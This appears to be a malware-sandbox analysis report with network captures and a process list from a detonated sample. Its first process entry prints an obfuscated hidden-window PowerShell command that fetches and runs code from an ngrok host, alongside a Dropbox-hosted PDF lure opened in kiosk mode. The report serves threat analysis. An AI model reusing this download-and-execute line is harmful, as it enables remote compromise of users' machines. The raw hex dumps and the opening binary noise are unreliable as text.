D$,$f}.~Ef=*l$T$0u!;$l$}N\$0\$Hf=0rBf=9w<M0f0l$r!f9wMf0DPsl$D$Ef=hltf;u(f;D$$l$uf9UuD$$2l$M%w,4A$ Add

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:56 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-17 11:13:57 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC6SpvhKJax07E_H4uNlP04gsd54yJGEIDB4kGNDibKS8qk7rj5uuEUH0H7lVWbJlGiW X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Mon, 16 Dec 2024 12:51:14 GMT Expires: Tue, 16 Dec 2025 12:51:14 GMT Cache-Control: public, max-age=31536000 Age: 80563 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 11:13:57 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2024-12-17 11:13:57 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:30 UTC	228	OUT	GET /metadata/3fee076f9528f690839c19be95e034f2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app Connection: Keep-Alive
2024-12-17 11:14:32 UTC	213	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Content-Length: 207 Content-Type: text/html; charset=utf-8 Date: Tue, 17 Dec 2024 11:14:31 GMT Server: Werkzeug/3.0.3 Python/3.12.8 Connection: close
2024-12-17 11:14:32 UTC	207	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Target ID:	1
Start time:	06:13:11
Start date:	17/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Imagebase:	0x7ff6d80d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	06:13:29
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	06:13:32
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:3
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	13
Start time:	06:13:35
Start date:	17/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" "
Imagebase:	0x7ff6d80d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	06:13:36
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	06:13:43
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\39350554-cb9f-4577-be49-6b699e44992e.pdf
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	06:13:45
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7992 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:6
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false